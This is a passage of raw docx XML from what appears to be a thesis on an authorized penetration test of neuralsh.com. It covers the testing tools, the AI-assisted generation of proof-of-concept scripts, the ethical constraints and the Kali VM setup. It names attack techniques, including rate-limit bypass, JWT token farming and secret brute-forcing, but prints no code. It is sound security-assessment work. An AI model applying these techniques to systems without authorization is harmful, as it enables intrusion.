        <w:t>Figure 13: Shodan internet-connected device search engine logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used as a passive intelligence source to verify that the services discovered by Nmap were also visible to external internet scanners — confirming these exposures were not local network artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Manual Testing Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Manual tools require the assessor to actively craft, send, and interpret requests based on judgment and understanding of the target's behavior. The most significant confirmed findings in this engagement were discovered through manual testing.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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Role in This Engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite Community</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Intercepted HTTP/S traffic, replayed requests, demonstrated rate-limit bypass and JWT farming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HTTP client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Crafted raw HTTP requests with custom headers for PoC exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CyberChef</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Data analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Decoded and inspected JWT token payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>dig / whois</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Manual DNS record enumeration — identified origin IP via MX record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>openssl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>TLS inspector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Inspected SSL certificate details — confirmed hostname and infrastructure leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Password cracker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Attempted JWT secret key brute-force against the rockyou.txt wordlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Used for controlled exploitation in the alternative testing environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 7: Manual testing tools used in this engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="1444543"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="burpsuite_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="1444543"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 14: Burp Suite Community Edition logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Burp Suite Community Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> served as the primary web application testing proxy throughout the engagement. All HTTP traffic between the testing machine and neuralsh.com was routed through Burp Suite's intercepting proxy, allowing every request and response to be inspected, modified, and replayed. The two confirmed exploited findings — Rate Limiting Bypass (N-005) and JWT Token Farming (N-007) — were both demonstrated using Burp Suite's Repeater tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="1237333"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cyberchef_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="1237333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 15: CyberChef data analysis tool logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, developed by GCHQ, was used to decode Base64url-encoded JWT tokens issued by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/init/token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint. By splitting the token into its three components (header, payload, signature) and decoding each, it was possible to inspect the token's signing algorithm, timestamps, expiry window, and embedded user claims without needing to crack the secret.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. AI-Assisted Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Artificial intelligence tools represented a supporting layer in this engagement — used to assist with specific technical analysis tasks during the testing process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="617567"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="claude_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="617567"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 16: Claude (Anthropic) AI assistant logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Claude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Anthropic was used during this engagement in the following technical capacities: proof-of-concept script generation for the rate-limiting bypass and JWT token farming tests; scan output analysis to cross-reference open ports against known service vulnerabilities; and CVSS scoring verification to ensure metric selections were consistent and defensible across all 20 findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It is important to note that all findings documented in this thesis were discovered and verified by the assessor through direct, hands-on interaction with the target systems. AI was used as a technical aid during the testing process — not as an author of this thesis. Every result produced with AI assistance was independently reviewed and validated before inclusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. Ethical Constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All testing activities were conducted with written authorization from Prestige Alliance Co., Ltd. The following self-imposed constraints were applied throughout the engagement:</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No production data was extracted, modified, or deleted at any point during testing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Rate-limiting bypass demonstration was capped at fifty requests per test scenario</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No persistent access mechanisms or backdoors were installed on any system</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MySQL brute-force testing was limited to a bounded pre-defined wordlist only</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No Denial of Service testing was conducted against any in-scope or adjacent system</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Full exploitation demonstrations were performed only within the controlled alternative testing environment (DVWA on Kali Linux VM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 4: IMPLEMENTATION AND DEPLOYMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This chapter documents the practical execution of the penetration testing engagement from start to finish. It begins with the environment setup used to conduct all testing, proceeds through reconnaissance, scanning, and vulnerability assessment on the real target, then documents the exploitation results — both on neuralsh.com and in a controlled alternative environment designed to demonstrate full web application exploitation technique without risk to the production system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.1 Testing Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Before any testing could begin, a dedicated and isolated testing environment was configured to ensure all activities were conducted in a controlled and professional manner. The environment consists of a host machine running Linux Mint 22.1, with a Kali Linux virtual machine deployed inside Oracle VirtualBox 7.0 for isolated penetration testing operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1.1 VirtualBox and Kali Linux Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VirtualBox was selected as the virtualization platform due to its open-source nature and full feature parity with commercial alternatives for this use case. Kali Linux — the industry-standard penetration testing distribution maintained by Offensive Security — was installed as a guest VM with the following specifications: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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Host OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Linux Mint 22.1 (host machine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Virtualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Oracle VirtualBox 7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
